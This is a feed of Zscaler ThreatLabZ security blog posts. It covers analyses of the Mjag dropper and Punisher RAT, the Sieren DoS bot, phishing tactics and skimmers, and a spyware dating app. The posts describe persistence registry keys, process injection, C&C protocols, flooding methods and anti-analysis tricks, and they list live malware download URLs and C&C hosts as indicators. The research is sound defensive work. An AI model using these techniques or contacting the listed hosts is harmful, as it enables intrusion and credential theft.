Security Posts

Mjag dropper: Using decoy documents to drop RATs

Zscaler Research - 9 min 32 sec ago
Mjag dropper Mjag dropper is compiled in the Microsoft .NET framework, and its original binary is obfuscated using SmartAssembly. The installation path and other details are stored in encrypted form using AES encryption (Fig. 1), and the decryption key is hardcoded. Fig. 1: AES decryption function The payload and decoy PDF is encrypted and stored in the resource section, and a custom encryption method has been used. The decryption key is hardcoded (Fig. 2). Fig. 2: Extracting decoy PDF and payload The decoy document claims to be an India Overseas Bank NEFT transaction statement. It lures users to click the “Click here to view full document” link, which points to a malicious website hosting a copy of the Mjag droppper payload. (Fig. 3). Fig. 3: Decoy PDF document   Installation Copies itself in “%APPDATA%\FolderN\name.exe”  location Creates startup key: “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load” with values as “%APPDATA%\FolderN\name.exe.lnk” Copies “C:\Windows\Microsoft.NET\Framework\\msbuild.exe” to “%TMP%\svhost.exe” Starts svhost.exe in suspend mode and injects the final payload (Fig. 4) Fig. 4: Process injection using Windows APIs However, the injected payload does not run properly and displays an error message (Fig. 5). Fig. 5: Unhandled exception popup This error is due to the injector code not being able to inject the overlay part of the payload, the part that contains the command-and-control (C&C) server details. As shown in the injection code snapshot below, it allocates memory in a target process similar to the size of image length defined in the PE header of payload (Fig. 6). This means Mjag will not be able to properly inject payloads (like Punisher RAT) that contain important data in the overlay.   Fig. 6: Injector code For the purpose of this blog we patched the memory mapping issue and continued our analysis of the infection cycle involving Punisher RAT. Analysis of Punisher RAT Punisher RAT is packed and written in .NET. The Punisher RAT builder is publicly available and can be configured with a range of features. In the builder (Fig. 7), you can configure the server IP, name, password, and listening port. The RAT will communicate on the given server IP and send all the information stolen from the victim’s machine. There is also a feature to add more functionality in binary, including anti-VMware, anti-AV, sandbox detection, and USB spread for further infection, among others. Fig. 7: Punisher RAT builder During analysis, we saw various functions of this malware, including: 1. Password stealing module The malware hunts for various application data and steals the credentials. Here (Fig. 8), it is trying to steal the stored login credentials for the Chrome browser. The stolen information will look like: |URL| http://facebook.com |USR| username or e-mail |PWD| userpassword Fig. 8: Stealing module The Punisher RAT attempts to steal sensitive data from the following applications on the infected system: Filezilla, No-IP Dynamic Update Client, Dyn DNS, Paltalk, FireFox, Chrome, Hotmail, Yahoo, Opera, and Internet Explorer. 2. Anti-task manager The malware checks for the following applications’ processes, and does not allow these applications to terminate any other processes running on the user's system. Process Explorer Process Hacker Task Manager This allows malware author to ensure that the malware processes cannot be terminated. Fig. 9 shows that while attempting to kill 'a.exe' process using the Process Explorer, the “OK” button will be replaced by an “Error” button. Fig. 9: Anti-task manager   3. Keylogging  The malware can capture keystrokes (Fig. 10) and store the data into the %AppData%/{random digits}.log file. Fig. 10: Capturing keystrokes   4. Persistence  The malware copies itself in the startup folder and creates a run key of this location. HKCU\\software\\microsoft\\windows\\currentversion\\run   5. Spreading vector It looks for a removable drive and CD-ROM for infection and creates an .lnk file. Below (Fig. 11) depicts the spreading mechanism through a USB device. Fig. 11: USB spread   6. AV checks The Punisher RAT checks for installed AV software (Fig. 12) and updates to the server. Fig. 12: Checking AV Network activity The hardcoded C&C information (Fig. 12) is extracted from the payload, and it will split the data with the delimiter “abccba.” Fig. 13: C&C server information   It also collects the information about the multiple running processes: AW|BawaneH|Process Explorernj-q8 AW|BawaneH|Notepadnj-q8 The table consists of extracted C&C information from the payload. This RAT uses “BawaneH” as a delimiter to split the server response data. It performs various actions based on received commands. There were a total of 59 commands used by the server, shown in the following table: Fig.14: Received commands IOCs Md5: 0a459c18e3b8bdef87a6fb7ea860acdb Filename: NEFTIOBAN1830369427520181030ABBIdiaLtddt30102018_pdf.exe Download URL: tenau[.]pw/owa/neftioban1830369427520181030abbidialtddt30102018_pdf.exe C&C: chris101.ddns.net Sandbox Report   Fig. 15: Zscaler Sandbox report        
Categories: Security Posts

The Top 10 ThreatLabZ blogs from 2018

Zscaler Research - 9 min 32 sec ago
The Zscaler ThreatLabZ team is continually hunting new threats, analyzing them, and sharing their findings in blogs and reports on the Zscaler site. What follows are the most read and shared blogs of 2018.   Android apps infected with Windows malware reemerge By Gaurav Shinde This blog explores apps available on Google Play that were infected with malicious iFrames. Though the malware posed no immediate threat to users, its discovery highlights the fact that infections can be propagated across different platforms. This vector can be leveraged by a clever attacker to serve second-level malicious payloads, depending on the type of device platform visiting the URL. Read more.   Fake Fortnite apps scamming and spying on Android gamers By Viral Gandhi Fortnite is a co-op sandbox survival game and, at the time of the ThreatLabZ report, had 45 million players and more than three million concurrent users. In 2918, its maker, Epic Games, announced a version for iOS. Malware authors, knowing that Android users would be anxious to get Fornite, created fake Fortnite for Android apps to spread their payloads, including spyware, a coin miner, and some unwanted apps. Read more.   CVE-2017-8570 and CVE-2018-0802 exploits being used to spread LokiBot By Mohd Sadique This blog provides an overview of the use of malicious RTF documents that leverage the CVE-2017-8570 and CVE-2018-0802 vulnerability exploits to install malicious payloads on victims’ machines. The team shares its analysis of a campaign leveraging these two exploits to deliver LokiBot. Read more.   The latest cloud hosting service to serve malware By Dhanalakshmi Cloud services are under attack because they enable bad actors to open inexpensive hosting accounts for hiding malicious content in the cloud-based domains of well-known brands. The ThreatLabZ team discovered that a popular managed cloud hosting service provider has been serving phishing attacks and other malware in the wild as far back as February 2018. Read more.   Meltdown and Spectre vulnerabilities: What you need to know By Deepen Desai With the ability to allow attackers to gain unauthorized access to sensitive information in system memory, Meltdown and Spectre represent a new class of microarchitectural attacks that use processor chip performance optimization features to exploit built-in security mechanisms. This blog provides an analysis of the vulnerabilities as well as mitigation information. Read more.   Cryptominers and stealers – malware edition By Atinderpal Singh and Rajdeepsinh Dodia Due to their decentralized nature, cryptocurrencies are impossible to control or censor by any single authority—and that makes them attractive to cybercriminals. With more than 4,000 cryptocurrencies on the market rising in both value and popularity, we’ve seen a rise in the use of malware that targets bitcoins or altcoins for financial gain. This blog provides insight into various cryptominers and stealer variants. Read more.   DarkCloud Bootkit By Nirmal Singh Following on its report about cryptomining and wallet stealing techniques, this blog provides a technical analysis of yet another type of cryptominer malware that uses a bootkit and other kernel-level shellcode for persistence. Read more.   Spam campaigns leveraging .tk domains By Mohd Sadique ThreatLabZ identified a campaign using the “.tk” top-level domain, which started with compromised sites that redirect users to either fake blog sites to generate ad revenue or fake tech support sites that claim to remove viruses. We estimated at the time that at least USD 20K per month in revenue was being generated from the fraudulent ad activities alone. Read more.   Magecart campaign remains active By Rubin Azad Magecart is a notorious hacker group that has been responsible for large-scale attacks on the e-commerce sites of well-known brands. In this blog, we examine the campaign’s recent activity and its methods for skimming credit and debit card information for financial gain. Read more.   Ubiquitous SEO poisoning URLs By Jim Wang SEO poisoning is an attack method that involves creating web pages packed with trending keywords in an effort to get a higher ranking in search results. SEO poisoning is also a way to redirect users to unwanted applications, phishing, exploit kits and malware, porn, advertisements, and so on. This blog includes examples and analysis of the techniques in use. Read more.
Categories: Security Posts

Sieren: A new DoS bot

Zscaler Research - 9 min 32 sec ago
Zscaler ThreatLabZ recently discovered a new DoS family bot named Sieren. A denial-of-service (DoS) attack is a cyber-attack in which cybercriminals disrupt the service of a host connected to the internet, either temporarily or indefinitely, to its intended users. In this analysis, we'll describe Sieren's functionality and communication, its 10 DoS methods, its bot commands, and its IoCs. Functionality Sieren is capable of performing HTTP, HTTPS, and UDP flooding on any web server location as instructed by the command-and-control (C&C) server. HTTP flood HTTPS flood UDP flood Network communication Sieren starts communication with the server by sending system information. Data is separated by the “&” symbol. ping User Name Machine Name OS version Processor architecture (If 32 bit then 0 else 1) MD5 of the above data In response, the C&C server sends a target URL for performing a DoS attack. Data is separated by the “&” symbol. pong 60: used for sleep (60 * 1000 millisecond) Task_ID = 260 Method = 2 Target = https://deti-online.com/ Type = GET Threads = 100 Sleep = 100 Port = 0 Sockets = 0 (number of sockets) Size = 0 (size of data sent through packet during Dos) CreatedAT = Timestamp Data = Empty (data sent through packet during DoS) The malware is capable of performing a DoS attack against the target URL using different methods. The variant we analyzed has 10 methods supported for flooding, and it chooses the method based on data received from the C&C server. In the above instance, we saw that a Russian education material website (https://deti-online[.]com) was the intended target for this bot. We also identified other locations, such as forum.exlpoit[.]in and x3p0[.]xyz, as the DoS targets from the C&C server during our analysis. The Sieren bot selects the DoS method based on data received from the C&C server. Below are the parameters used in these methods:   Method Task_ID Target Type(GET/POST) No. of threads Sleep Data No. of Sockets Port Size of data 1 Yes Yes Yes Yes Yes         2 Yes Yes Yes   Yes         3 Yes Yes Yes             4 Yes Yes     Yes Yes       5 Yes Yes     Yes         6 Yes Yes         Yes Yes   7 Yes Yes         Yes Yes   8 Yes Yes         Yes Yes Yes 9 Yes Yes           Yes Yes 10 Yes Yes           Yes Yes   The C&C server can specify the port, data, sleep time, sockets, and size of packets that will be used during flooding. During flooding, a user agent is selected randomly from a predefined list, as shown below. DoS methods supported by Sieren Method 1: In this method, the malware first gets the cookies for the target URL using InternetGetCookieEx and uses them in the HTTP header when generating flood requests. Based on the protocol (HTTP/HTTPS) and method (POST/GET), it starts sending multiple requests to the target URL. The below screenshot contains code for generating the header part. The below screenshot contains the HTTP flooding code: The below screenshot contains the HTTPS flooding code: Method 2: The malware creates 50 sockets and sends 50 HTTP requests before executing a sleep command with the value supplied by the C&C server. It will repeat this process until taskID is active. Method 3: This method is similar to method 2, but the bot won’t sleep after every 50 requests. Method 4: In this method, the bot will use data supplied by the C&C server in the flood requests to the target URL. Method 5: In this method, the bot will also accept a response during the flooding of the target URL, after which it will sleep for 100 seconds. Then it again starts sending flood requests to the target URL. Method 6: This method is called when the number of sockets and port is specified by the C&C server. In this method, the bot will not send HTTP or HTTPS flood requests; instead, it opens multiple sockets for the target URL in an attempt to exhaust web server-side resources. It repeatedly closes and opens additional sockets to the target URL until taskID remains active. Method 7: This method is identical to Method 6 and appears to be a placeholder for a future update. Method 8: In this method, the bot will receive arguments such as the size of random data, number of sockets, and port information from the C&C server. The bot will generate random data based on specified size, open multiple sockets, and flood the target URL with the randomly generated data. Method 9: In this method, the C&C server will supply the size of random data and port information. The bot will generate random data and flood the target URL on the specified port. Method 10: This method is used for UDP-based flooding. The bot will send random data using the UDP protocol, and it sets the TTL (time to live) value between 220 and 225 for these packets. The bot will stop performing flood requests once the C&C server stops sending additional commands. Sieren bot commands: Other than the DoS feature-related methods, the malware has three additional commands. “dlexec”: Download payload from the URL given by the C&C server and execute it. “update”: Download the updated version and execute it. It also deletes itself using the cmd process. “Uninstall”: Deletes itself using the cmd process. Indicators of Compromise: MD5 320A600147693B3D135ED453FAC42E82 URL cx93835[.]tmweb.ru/rrljw91zqd.exe burgerkingfanbase[.]net/great.php  
Categories: Security Posts

2019 Will See Cybercriminals Eye Opportunities in Cryptocurrency and IoT to Launch Their Attacks

Zscaler Research - 9 min 32 sec ago
Cybercriminals never take vacations. They’re always scanning the horizon to see which new technologies are being adopted by legitimate enterprises and are therefore ripe to be exploited, or how to utilize trusted protocols to steal credentials of unsuspecting consumers. The coming year will be no different, but the tools in some cases will change. Here are my predictions for the cybercrime trends that will get our attention in 2019. Prediction #1: Malware operators will cash in on cryptocurrency We’ll continue to see more and more malware operators make money on cryptocurrency, either by mining coins using infected systems or by stealing cryptocurrency from the infected systems. This will involve new and existing malware strains that will add cryptomining and stealing functionality. The three most common types of crypto-malware include cryptominers, wallet stealers, and clipboard hijackers, and we expect to see an increase in all three types. Here’s how they work: When downloaded, cryptominer malware works in the background to steal CPU cycles that can mine and generate digital currency like bitcoins without users’ knowledge or consent. By spreading their malware across thousands of machines, the miners form a mining pool that can result in big payoffs for the malware author. In 2018, cryptomining surpassed ransomware to become one of the top threats, and that trend is expected to continue. Wallet stealing will increase, too, in both frequency and sophistication. Wallets don’t store the cryptocurrencies; instead, they store credentials to access or spend the money, which is stored in blockchain. Expect to see new variants that contain the functionality to locate and steal wallet.dat files. Clipboard hijacking is another recent innovation. Because cryptocurrency wallet addresses are long, random-looking sequences of alphanumeric characters, they are difficult to remember. Almost all cryptocurrency owners copy and paste their wallet address for making transactions; on an infected system, malware can monitor for cryptocurrency transactions and dynamically change the wallet address on the clipboard to that of the malware operator so that future transactions benefit the malware operator. Prediction #2: SSL/TLS-delivered threats will become more common We’ve seen steady growth in overall SSL/TLS-encrypted traffic this year, which now accounts for almost 75 percent of total enterprise traffic going through the Zscaler cloud. Cybercriminals are leveraging this encrypted channel at all stages of the cyber kill chain. In particular, there has been a sharp increase in phishing attacks and malware payload delivery over encrypted channels. In the latter half of 2018 alone, we saw that 35 percent of phishing content was delivered over encrypted channels, representing a 300 percent increase since 2016. Though the volume of SSL/TLS-encrypted traffic has risen sharply, much of it is going uninspected, either because it’s assumed to come from trusted sources or, more likely, because of the impact inspection would have on network performance. Attackers can now hide malware in encrypted traffic knowing it is not likely to be inspected. In 2019, we will continue to see SSL/TLS utilized by cybercriminals to launch attacks, and we anticipate an increase in phishing attacks and malware payload deliveries over these channels, as cybercriminals take advantage of the assumed trust in encryption as well as the ease with which they can obtain digital certificates. Prediction #3: IoT threats will have a greater impact on enterprises IoT footprints in the enterprise network have grown rapidly over the past few years, and these internet-connected devices can pose significant risks to enterprise networks. We will continue to see cybercriminals leverage IoT devices as a beachhead to large-scale attacks against enterprise networks. Some of the largest attacks on record are the result of hackers using IoT devices to carry out massive distributed-denial-of-service (DDoS) attacks (you can read about some of them here and here). IoT devices have notoriously poor security with known default passwords that are rarely ever changed, and manufacturers are slow to patch vulnerabilities. In addition to employee-owned devices coming into the workplace, organizations are adding hundreds or even thousands of IoT devices to their environments, such as cameras, printers, IP phones, televisions, kitchen appliances, thermostats, and more. Besides the potential for DDoS attacks, IoT vulnerabilities are being used by attackers as an entry point to a network, in which they can hop from one vulnerable device to the next, undetected. One an attacker gains a toehold into a network through a compromised device, it can be used for spreading malware, stealing credentials, leaking data, and sniffing traffic. Unfortunately, until manufacturers take the threat seriously and bake security into their devices, the attacks will continue to rise in 2019 and beyond. The US-CERT (United States Computer Emergency Readiness Team) has provided security tips for IoT devices here. Prediction #4: Supply-chain attacks will grow There has been a steady increase in software supply-chain attacks in recent years. These attacks used to be targeted in nature, singling out a specific industry or organization, such as government. However, we’re seeing software supply-chain attacks used for commodity malware as well, which has the potential to impact larger numbers of users. We will see cybercriminals continue to focus on attacking critical software supply-chain infrastructure to conduct larger attacks. An example of the fast and massive damage that a software supply-chain attack can inflict is the June 2017 NotPetya attack. The initial infection was through an accounting software website and, by the end, it had wiped data from many thousands of computers around the world at banks, energy firms, governments, and more. Not only is a company’s valuable data and IP at risk, so too is their reputation—which in the end hits its bottom line. NotPetya appeared to be a state-sponsored attack, but most supply-chain attacks are the result of poor security hygiene, which attackers are always prepared to exploit. Prediction #5: Criminals will turn their attention to cloud service providers The increase in cloud adoption has shifted a lot of workflows to the cloud. With that shift, we’ll see more attacks aimed at infiltrating cloud service providers in an attempt to gain access to valuable data from the organizations using the cloud services. These attacks may have a far-reaching impact, in light of the volume of data companies are storing in public clouds, and they can pose severe financial consequences.  The cloud service providers themselves have invested heavily in security protections and have large security teams to ensure their systems are sound—they are far more secure than the typical enterprise data center. But most cloud services and their configurations are new and evolving, and mistakes, such as the widely publicized S3 bucket misconfigurations, have led to the exposure of sensitive data at many organizations. But the most common source of errors leading to data leaks or the spread of malware is the end-user. While your cloud storage system may be impenetrable, there is always the risk that employees will be careless with their credentials, enabling bad actors to access your valuable data. In 2019, we expect to see an increase in social engineering attacks aimed specifically at employees accessing cloud applications.    
Categories: Security Posts

Cyber Monday: The biggest day for cyberattacks? Not by a long shot.

Zscaler Research - 9 min 32 sec ago
Last week, the Zscaler ThreatLabZ research team did an analysis of phishing attacks we’ve come across in our cloud leading up to Black Friday and Cyber Monday. The team had been seeing an increase in a variety of phishing activities, with targeted attacks and faked login pages designed to steal the credentials of unsuspecting shoppers. (You can read their informative report here.) With Black Friday and Cyber Monday behind us, we decided to take another look at the data to determine the volume of shopping activity across our cloud and the expected rise in threat activity that coincides with major online events. What we found was that Cyber Monday was, indeed, the biggest shopping day of the year on our cloud and elsewhere. According to the National Retail Federation, 50 million people shopped online in the U.S. alone. Amazon reported that Cyber Monday was its biggest shopping day in history, and over the five days from Thanksgiving through Monday, Amazon customers bought more than 180 million items. What we saw more than a billion times We can attest to the high volume of shopping activity. On Cyber Monday, the Zscaler cloud processed 1.35 billion internet requests on shopping sites, with the highest volume by far on Amazon, at 372,824,847 requests. While Monday’s shopping traffic only represented 2.18 percent of traffic overall on our cloud, it was 72 percent higher than shopping traffic on a typical day. Cyber Monday top five shopping sites on the Zscaler cloud: Number of requests we processed on Cyber Monday's top shopping sites. With so much shopping activity, you might think that Black Friday and Cyber Monday would be the days that cybercriminals would crank up the volume, launching phishing attacks and spreading malware to online shoppers. But the traffic patterns on our cloud show otherwise. Phishing attacks are planned and executed with precision On Cyber Monday, we blocked a total of 2,337,537 phishing attempts. That’s significant, but that number was actually down from the days before Black Friday, and this decrease is consistent with patterns we’ve seen. Attacks peak in the days leading up to major events or shopping days. Attackers plan their phishing campaigns for the days when potential victims are looking for deals, aligning their attacks with mainstream advertising campaigns. On the “big day,” when shoppers have already decided what sites to visit, the attacks drop off accordingly. On the three days before Thanksgiving, we blocked the highest numbers of phishing attempts, with a peak of 4.4 million on Wednesday. By Black Friday, attacks had dropped by nearly 30% from the high. They continued to decrease in volume through Monday when attacks were down 46% from Wednesday. November graph shows daily phishing attempts on the Zscaler cloud Why did attacks drop on Cyber Monday? It’s been a long time since hackers could be stereotyped as nerds in the basement using their programming skills to bootleg videos. Today’s criminals are sophisticated in their technical execution and in their understanding of market drivers and user behavior. They operate their campaigns like big businesses—because they are. They know when you’re most likely to be online and when you’ll be sifting through the most email (Monday is the most popular day for phishing attacks). They know you’re more likely to open tracking slips or invoices than an unknown attachment. And they exploit the trust you have in brands like Amazon, Kohl’s, Bank of America, and many others, by creating fake websites that look just like the real thing. Consumers must change their online behavior accordingly, approaching each online interaction with an awareness of its potential risk. You can’t assume that attachments are safe, even if you recognize the name of the sender; spoofing names is practically effortless. You can’t assume that text messages are safe either, due to the rise in SMS phishing. So-called “SMiShing” links can take you to compromised websites, just as infected email attachments can. E-commerce websites can be compromised in a variety of ways. Hackers can inject JavaScript into a site and the script sends data collected in the input fields to the hacker’s remote server. A favorite tactic is creating sites that look like legitimate sites but are designed to steal your personal information. Can you tell the difference between these two Amazon login screens? The screen on the left is a login for a phishing site that will collect your personal information, including credit card number, and you’ll think you’re on the Amazon site the whole time. The one on the right is a real Amazon login screen. The only difference is in the address bar. Be sure the site you are on matches the URL address. We also know, as we stated earlier, that today’s cybercriminals plan their campaigns with a marketer’s precision. It’s wise to take extra precautions leading up to and during big events or news days (another day in November when we saw a surge in phishing activity was the sixth, the U.S. election day). Three things you can do right now to protect yourself from phishing: Check the authenticity of the URL or website address before clicking on a link; make sure the address matches the site you're visiting Ensure online retailers and banking sites use secure connections; the URL should start with HTTPS Inspect the source of emails with enticing shopping deals; be wary of all links and attachments More resources: Read the ThreatLabZ Phishing Roundup blog for an analysis of current phishing trends Download the infographic:
Categories: Security Posts

Black Friday & Cyber Monday Deals: Phishing and Site Skimmers

Zscaler Research - 9 min 32 sec ago
It’s that time of year again! The most glorious of shopping seasons has arrived, and users have commenced their annual tradition of flooding e-stores in search of the best deals that their money can buy. Threat actors, keen to take advantage of increased seasonal shopping activity, are deploying targeted phishing campaigns and site skimmers in the hopes of cashing in. The spectrum of attacks is reaching users in nearly all aspects of their online presence. Email, tweets, and websites are all vehicles of abuse. Zscaler has seen a steady rise in phishing attacks leading up to Black Friday and Cyber Monday, and we'll provide an overview of them here. Fig. 1: Malicious activities from mid-October through mid-November. The turquoise bars represent targeted phishing attacks. Targeted phishing Examining one of the targeted phishing campaigns illustrates the need for caution when shopping online. The faked Amazon screen provides the perfect example, because Amazon is probably the most prolific online shopping site used during the holidays. Aside from the address bar, it's a relatively good knock-off. Fig. 2: Faked Amazon sign-in form. This attack doesn’t stop at compromising your Amazon credentials. This site also wants your credit card information! Fig. 3: Faked Amazon billing page. A closer look at this attack shows that the attackers don’t even have the decency to encrypt your stolen credentials. Fig. 4: Wireshark exposes the packets moving between client and server over HTTP. The best defense is to always be conscious of the address bar. A store like Amazon is never going to ask you for sensitive information away from the Amazon site. Site skimmers Other sophisticated attacks that have proven to be even more insidious are site skimmers like MageCart. MageCart refers to a hacker group that is responsible for large-scale attacks on e-commerce sites. MageCart will compromise a well-known or trusted site and inject malicious, obfuscated JavaScript that can tap into purchases. The injected script will add a form to the payment page at runtime using Document Object Model (DOM) properties. Information skimmed from this attack can include all the personal information requested by the compromised e-commerce page. More information about this type of attack is detailed in another blog. Despite several security vendors taking notice, users are still being impacted daily. An updated chart on MageCart hits since our September 28 blog shows that this advanced attack is not stopping anytime soon. Fig. 5: MageCart activity between September 20 and November 15. The best defense against this threat is to have a malware detection tool that is inline with the browser. These tools have the best chance of detecting the malicious JavaScript code on an online store's page. Cryptocurrency Mining The final attack we'll review is the use of cryptojacking. Unlike the other attacks discussed, cryptojacking does not target the user's sensitive information but rather their system resources. A small piece of javascript can be injected into a page which will leverage the user's browser processes to mine cryptocurrency for the attacker. Attackers will leverage user susceptibility to the shopping season to bolster their cryptowallets. Fig. 6: An online shopping aggregator linking to Amazon, but redirecting user's to mine Monero Cryptocurrency Behind the scenes of this shopping site, lies a small piece of javascript that redirects the user's system resources to mine cryptocurrency through the application, CoinHive. Fig. 7: Coinhive injection script will use the user's system resources to mine the cryptocurrency, Monero. The best defense against this kind of attack is to use javascript blocking browser applications like ScriptSafe or NoScript to toggle what sites may execute javascript.  Conclusion The ThreatLabZ team at Zscaler works diligently to ensure that customers do not fall victim to malicious activities described above. Users should be cautious and protect themselves by reviewing our security checklist, particularly during the shopping season: Check the authenticity of the URL or website address before clicking on a link Ensure online retailers and banking sites use HTTPS/secure connections Do not use unsecured public Wi-Fi for shopping Inspect the source of emails with enticing shopping deals; be wary of any suspicious attachments Steer clear of unofficial mobile application stores Use two-factor authentication whenever possible, especially on sensitive accounts such as those used for banking Always ensure that your operating system and web browser are up to date and have the latest security patches installed Use browser add-ons like Adblock Plus to block popups and potential malvertisements Use browser add-ons like No Coin to block a site's attempts to use your computer for cryptocurrency mining Back up your documents and media files Review the Identity Theft Guide and FAQs from the Federal Trade Commission Review the  National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message Wishing you all a very happy, healthy, and safe Thanksgiving! Zscaler™, Zscaler Internet Access™, Zscaler Private Access™, ZIA™ and ZPA™ are either (i) registered trademarks or service marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States and/or other countries. Any other trademarks are the property of their respective owners.
Categories: Security Posts

Zscaler ThreatLabZ Phishing Roundup

Zscaler Research - 9 min 32 sec ago
Phishing is an attempt to steal personally identifiable information, such as Social Security numbers, credit card details, date of birth, and other sensitive data. Typically, phishing targets a user with an email containing a link to a website that imitates a legitimate website the user might visit. As users have become savvier about their online practices, the developers of phishing sites have upped their game, too, and many of the sites we see are carefully designed to look like the sites they’re imitating, and clever tactics are used to trick potential victims. In this blog, we will share some insights from phishing activities blocked across the Zscaler™ cloud. We’ll cover the top brands and categories we are seeing targeted by phishing campaigns, recent examples of campaigns, and some of the tactics being used by threat actors to be more successful. Types of phishing There are different types of phishing activity, including: Spear phishing, in which the phishing attempt is targeted against certain organizations or individuals working for specific companies. SMiShing, also known as SMS phishing, which involves a message (SMS communication) that targets victims and entices them to click on URLs hosting phishing websites. Whaling, in which threat actors target high-profile individuals, such as senior executives in a company, most often to gain internal company information that is not public knowledge. What brands are being targeted? While it might be easier to spoof the sites of lesser-known brands, where differences wouldn’t be so apparent, the actors trying to steal personal information need to impersonate popular sites for maximum return, raising the odds of snaring a victim. Their phishing sites often feature the biggest brands, and they use a variety of tricks to evade detection, which we’ll describe in this report. Some of the most commonly targeted brands we’ve seen in the recent phishing campaigns can be seen below: Fig. 1: Top phished brands in the Zscaler Cloud Microsoft tops the list partly because of Microsoft’s multiple enterprise web properties, such as OneDrive, Office 365, Outlook Web Access, among others, being targeted by the threat actors. Microsoft was followed by Facebook and PayPal in the list. In addition to the known brands, it was interesting to see phishing campaigns targeting Travel Visa portals (Canadian Visa and Australian Visa, for example) included in our top five most targeted brands. The attackers in this case were most likely interested in phishing for sensitive immigration information, such as passport details, date of birth and national identification numbers. The top five most commonly targeted application categories we saw in the recent phishing campaigns include: Communications (41.4%) Social media (18.3%) Finance (16.7%) Travel (12.4%) Dating (3.4%)  Fig. 2: Top phished site categories in the Zscaler Cloud Delivery of phishing content The majority of the phishing campaigns start with an email or message containing a link to a site hosting the phishing page. If the user clicks on the link, the phishing page is delivered. We have seen an increasing number of phishing attempts being delivered over an encrypted channel (HTTPS) -. We believe this increase is most likely due to the availability of domain validated (DV) SSL certificates. These certificates are easy to obtain from free SSL cert providers like Lets Encrypt as well as commercial Certificate Authorities. Multiple commercial CAs also offer free DV SSL certs with shorter validity periods with the expectation that the client will purchase a paid certificate once those expire. However, these offers provide a safe haven for cybercriminals who often leverage these short-term certs to deliver malicious content and then discard them. About 65 percent of all phishing content we’ve seen in the past three months was over HTTP and the remaining 35 percent was over HTTPS. This represents a 300 percent increase in phishing content being delivered over HTTPS since 2016. A look at recent phishing examples: Chalbhai campaign We continue to see a known phishing campaign using the tag chalbhai in its form statements. This campaign has been targeting users with phishing pages that mimic American Express, Microsoft Office, and Adobe, seasonal campaigns like fake IRS and TurboTax webpages during tax season and more recently holiday shopping season pages. A sample of this tag being used on a Wells Fargo phishing page is shown below. Fig. 3: Chalbhai tag shown in the source code Usage of compromised sites Below is an example of a legitimate site that is compromised and the attacker has hosted multiple phishing sites on the compromised domain. The screenshot shows the open directory found on the compromised web server. Fig. 4: Compromised web server The two screenshots that follow are phishing pages designed to look like pages of legitimate websites, including a single sign-on page for Abilene Christian University and a Bank of America page. Fig. 5: Faked SSO for Abilene Christian University Fig. 6: Faked Bank of America page If the user falls for these phishing pages, the credentials are harvested and posted to the attacker controlled location. Evasion and Anti-Analysis Techniques 1. Use of images instead of content The phishing websites are usually cloned copies of the legitimate sites. The difference in the case of Bank of America is that the faked page is almost entirely made up of a single image with a simple credential login form. This helps to evade engines running heuristics on the page source code. 2. Preventing access to page source A simple anti-analysis technique used by scammers is disabling the right click functionality to prevent users from checking the page source. This can be seen in the phishing page below, which is pretending to be an Adobe Online document. Fig. 7: Malicious Adobe Online document  3. Filtering based on User IP address, Host Names, and User Agent strings involved in the request We’ve also observed malicious actors trying to fingerprint and serve phishing content based on the user’s IP address, host names, and user agents. We can see an example in the snippet below where the attacker is maintaining a list of IP addresses, hostnames and User-Agent strings known to be used by security researchers and analysts while attempting to get the phishing. If any request to the phishing site arrives from one of the known IP addresses or hostnames, or has one of the listed User-Agent strings then the phishing page will not be served. This tactic helps the attacker to keep the phishing page content undetected for a longer duration. Fig. 8: Banned source IP addresses, hostnames and User-Agent strings 4. Exfiltrating information as an image instead of content We have also seen multiple instances of phishing attacks that prompt users to verify their identity by asking them to upload a copy of their ID, as shown in the code below.   Fig. 9: Coded to prompt users to upload identification card The sensitive user information in this case is being stolen in the form of an image which will bypass content based data loss prevention engines. 5. Encrypted Phishing We have also seen a few phishing pages that use encryption to hide the source code in an attempt to evade detection by security engines. One such example, for a faked PayPal page, is shown below. Fig. 10: Encrypted source code for a phishing page 6. Punycode based hostnames We have also seen attempts to use punycode, in which threat actors use homograph techniques to construct a URL that looks like a legitimate URL, but uses characters in non-English language character sets to trick the user. (See our Punycode blog for examples of this technique.). This technique makes it difficult for reputation based engines to keep up. Anatomy of Scam Page creation Let’s now take a look at how typical scam web pages are created to perform financial fraud and phish for sensitive information. Attackers copy website templates to create scam websites making the scam pages look very similar to the original as seen below: Fig. 11: Scam websites are built using templates to mimic legitimate sites Most of the time, the fakes would include small changes to evade detection, like changing the names of the doctors on the following page but the site is identical otherwise. Fig. 12: Small changes that help attackers evade detection The scam websites even have live chat support, which responds to queries and guides users through the payment process. The photos of doctors were taken from a royalty-free stock photography database. When checking the source code in the Fig 11 example, we found that the contents were copied from a legitimate site, santabarbaraherbclinic[.]com, and we can see the timestamp in the screenshot below. Fig. 13: Source code in scam website shows copied content from a legitimate site Conclusion Phishing attacks have been on the rise over the past few years. As the end users become more vigilant against clicking suspicious links, attackers have also upped the ante by evolving the way in which the phishing content is being delivered as well as tactics being leveraged to make the phishing pages stay undetected for longer period. While in this blog we focused mainly on commodity phishing and scam pages, some of the tactics mentioned here are also commonly seen in many of the targeted phishing campaigns (Spearphishing, Business Email Compromise, etc). ZscalerTM ThreatlabZ actively tracks and ensures coverage against phishing campaigns.
Categories: Security Posts

Soulmate: A Dating App That Spies On You

Zscaler Research - 9 min 32 sec ago
During a recent hunt for malware, the Zscaler™ ThreatLabZ team came across a piece of spyware disguised as an Android app and hosted on Google Play, Google’s official Android app store. The app portrays itself as partner matching app called Soulmate, designed to help you find (and keep tabs on) your True Love.  But the app has capabilities beyond those described by the developer, like snooping on incoming and outgoing calls, intercepting SMS messages, stealing contacts, tracing current and last-known location, and more.    Fig 1: Soulmate app on Google Play    Zscaler notified Google about the presence of this app and it was immediately taken down from Google Play.   App Details Name : Soulmate  Package Name : com.kikde.soulmate Hash : 28be1a661e375547df52e7b544c2745b Size : 8.6M Installs : 50+ Offered By : Kikde App   Detailed Information  As soon as the app is started, it greets the user with a splash screen and some basic setup activities. It also asks to register itself as default keyboard. By doing so, it can log every keystroke entered by the user.    Fig 2: Initial activities   During our analysis, we received a 404 error from the app’s command and control (C&C), which may have been a ploy or may have simply meant that the services were not available at the time of analysis. We decided to look further and found several permissions being asked that did not align with the name or purported function of the app. The screenshot below shows the list of permissions asked by the app.   Fig 3: Android permissions   Once the setup was done, the app registered and started some services and broadcast receivers. Android services are components that can run in the background without user 